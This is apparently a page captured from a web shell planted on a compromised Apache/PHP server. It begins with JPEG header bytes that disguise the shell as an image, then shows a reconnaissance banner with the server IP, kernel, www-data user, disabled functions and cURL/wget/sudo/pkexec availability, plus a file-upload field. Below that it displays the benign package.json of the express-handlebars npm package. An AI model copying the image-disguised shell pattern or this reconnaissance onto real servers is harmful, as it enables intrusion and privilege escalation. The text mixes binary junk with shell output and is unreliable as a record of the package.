����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 74.208.127.88 / Your IP : 3.135.211.95 Web Server : Apache/2.4.41 (Ubuntu) System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64 User : www-data ( 33) PHP Version : 7.4.3-4ubuntu2.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/html/app6/node_modules/express-handlebars/ |
Upload File : |
{ "name": "express-handlebars", "description": "A Handlebars view engine for Express which doesn't suck.", "version": "6.0.6", "homepage": "https://github.com/express-handlebars/express-handlebars", "keywords": [ "express", "express3", "handlebars", "view", "layout", "partials", "templates" ], "author": "Eric Ferraiuolo <eferraiuolo@gmail.com> (http://ericf.me/)", "repository": { "type": "git", "url": "git://github.com/express-handlebars/express-handlebars.git" }, "bugs": { "url": "https://github.com/express-handlebars/express-handlebars/issues" }, "engines": { "node": ">=v12.22.9" }, "dependencies": { "glob": "^8.0.2", "graceful-fs": "^4.2.10", "handlebars": "^4.7.7" }, "main": "dist/index.js", "directories": { "example": "examples" }, "devDependencies": { "@semantic-release/changelog": "^6.0.1", "@semantic-release/commit-analyzer": "^9.0.2", "@semantic-release/git": "^10.0.1", "@semantic-release/github": "^8.0.4", "@semantic-release/npm": "^9.0.1", "@semantic-release/release-notes-generator": "^10.0.3", "@types/glob": "^7.2.0", "@types/jest": "^27.5.1", "@typescript-eslint/eslint-plugin": "^5.23.0", "@typescript-eslint/parser": "^5.23.0", "eslint": "^8.15.0", "eslint-config-standard": "^17.0.0", "eslint-plugin-import": "^2.26.0", "eslint-plugin-n": "^15.2.0", "eslint-plugin-promise": "^6.0.0", "jest-cli": "^28.1.0", "semantic-release": "^19.0.2", "ts-jest": "^28.0.2", "typescript": "^4.6.4" }, "release": { "plugins": [ "@semantic-release/commit-analyzer", "@semantic-release/release-notes-generator", "@semantic-release/changelog", "@semantic-release/npm", "@semantic-release/github", "@semantic-release/git" ] }, "scripts": { "test": "jest --verbose", "test:cover": "jest --coverage", "lint": "eslint .", "build": "tsc" }, "license": "BSD-3-Clause" }